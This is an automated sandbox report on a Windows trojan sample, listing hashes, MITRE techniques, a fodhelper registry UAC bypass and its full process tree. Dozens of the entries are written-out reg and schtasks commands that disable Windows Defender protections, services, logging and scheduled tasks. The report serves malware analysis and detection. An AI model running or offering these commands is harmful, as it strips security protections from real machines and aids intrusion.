87fbd9577039b209cd0ce825d1c79aad0def611625b737fa3abe70802da4d6f4

General

Target

04436C72506D84210A597C57880DBE3E.exe
Size

1.4MB
MD5

04436c72506d84210a597c57880dbe3e
SHA1

d77bf018b1fa76215f2ca680e4cf25ad034eb271
SHA256

87fbd9577039b209cd0ce825d1c79aad0def611625b737fa3abe70802da4d6f4
SHA512

4dcfcc70d77c0fcf0fc74622f37cd176f0130bf8158330a6588d6c4c5bfcafc082dd003d514a10bbb01b12af575a3558d6255e65fd6ca90204e886d3f6a92064

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

04436C72506D84210A597C57880DBE3E.exe

description	ioc	process
File opened (read-only)	\??\L:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\P:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\S:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\T:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\V:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\F:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\J:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\O:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\W:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\X:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\Y:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\E:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\N:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\H:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\K:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\M:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\Q:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\U:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\Z:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\B:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\G:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\R:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\A:	04436C72506D84210A597C57880DBE3E.exe
File opened (read-only)	\??\I:	04436C72506D84210A597C57880DBE3E.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

04436C72506D84210A597C57880DBE3E.exe

pid	process
652	04436C72506D84210A597C57880DBE3E.exe
652	04436C72506D84210A597C57880DBE3E.exe
652	04436C72506D84210A597C57880DBE3E.exe
652	04436C72506D84210A597C57880DBE3E.exe
652	04436C72506D84210A597C57880DBE3E.exe
652	04436C72506D84210A597C57880DBE3E.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 15 IoCs

Processes:

04436C72506D84210A597C57880DBE3E.exe04436C72506D84210A597C57880DBE3E.exe04436C72506D84210A597C57880DBE3E.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	04436C72506D84210A597C57880DBE3E.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	04436C72506D84210A597C57880DBE3E.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\04436C72506D84210A597C57880DBE3E.exe -wdkill\ue300"	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open	04436C72506D84210A597C57880DBE3E.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\04436C72506D84210A597C57880DBE3E.exe -wdkill"	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	04436C72506D84210A597C57880DBE3E.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	04436C72506D84210A597C57880DBE3E.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command\DelegateExecute	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell	04436C72506D84210A597C57880DBE3E.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings\shell\open\command	04436C72506D84210A597C57880DBE3E.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\ms-settings	04436C72506D84210A597C57880DBE3E.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

04436C72506D84210A597C57880DBE3E.exe

description pid process

Token: SeShutdownPrivilege 652 04436C72506D84210A597C57880DBE3E.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

04436C72506D84210A597C57880DBE3E.exe

pid process

652 04436C72506D84210A597C57880DBE3E.exe
652 04436C72506D84210A597C57880DBE3E.exe

description	pid	process
Token: SeShutdownPrivilege	652	04436C72506D84210A597C57880DBE3E.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

04436C72506D84210A597C57880DBE3E.exefodhelper.exe04436C72506D84210A597C57880DBE3E.exe

description	pid	process	target process
PID 652 wrote to memory of 1628	652	04436C72506D84210A597C57880DBE3E.exe	fodhelper.exe
PID 652 wrote to memory of 1628	652	04436C72506D84210A597C57880DBE3E.exe	fodhelper.exe
PID 1628 wrote to memory of 1504	1628	fodhelper.exe	04436C72506D84210A597C57880DBE3E.exe
PID 1628 wrote to memory of 1504	1628	fodhelper.exe	04436C72506D84210A597C57880DBE3E.exe
PID 1628 wrote to memory of 1504	1628	fodhelper.exe	04436C72506D84210A597C57880DBE3E.exe
PID 1504 wrote to memory of 3568	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3568	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3568	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3984	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3984	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3984	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1332	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1332	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1332	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2132	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2132	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2132	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1192	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1192	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1192	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3888	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3888	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3888	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1692	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1692	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1692	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2484	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2484	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2484	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1868	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1868	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1868	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3212	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3212	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3212	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 312	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 312	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 312	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 188	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 188	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 188	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3704	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3704	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 3704	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 704	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 704	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 704	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2200	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2200	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2200	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2092	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2092	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 2092	1504	04436C72506D84210A597C57880DBE3E.exe	reg.exe
PID 1504 wrote to memory of 1276	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 1276	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 1276	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 3164	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 3164	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 3164	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 2216	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 2216	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 2216	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 2300	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe
PID 1504 wrote to memory of 2300	1504	04436C72506D84210A597C57880DBE3E.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe
"C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe"
1⤵
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:652

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1628

C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe
"C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe" -wdkill
3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:3568

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:3984

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:1332

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:1192

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:2132

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:3888

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:2484

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:1868

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:3212

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:188

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:312

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:3704

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:704

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:1276

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:3164

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:2300

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:2892

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:868

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2624

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2172

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:2216

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2092

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:596

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3380

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2200

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1852

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2456

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:4184

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:4216

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:4248

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:4280

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:4196

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4316

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:4356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:4392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4444

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:4584

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:4704

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:4772

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:4672

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4808

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:4960

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:5004

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:4920

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:4848

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:5108

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:928

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:2132

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:5072

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:2072

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4152

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:820

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4052

C:\Windows\System32\fodhelper.exe
"C:\Windows\System32\fodhelper.exe"
2⤵
PID:4232

C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe
"C:\Users\Admin\AppData\Local\Temp\04436C72506D84210A597C57880DBE3E.exe" -wdkill
3⤵
- Modifies registry class
PID:4252

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:4644

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4352

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:4372

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:4788

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:4528

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:4840

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:4496

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:4260

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:4300

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:4248

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4804

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:4380

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:4600

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:4712

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:4556

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4512

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:4572

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4216

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:4208

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:4340

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:4680

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4416

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4268

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4476

C:\Windows\SysWOW64\reg.exe
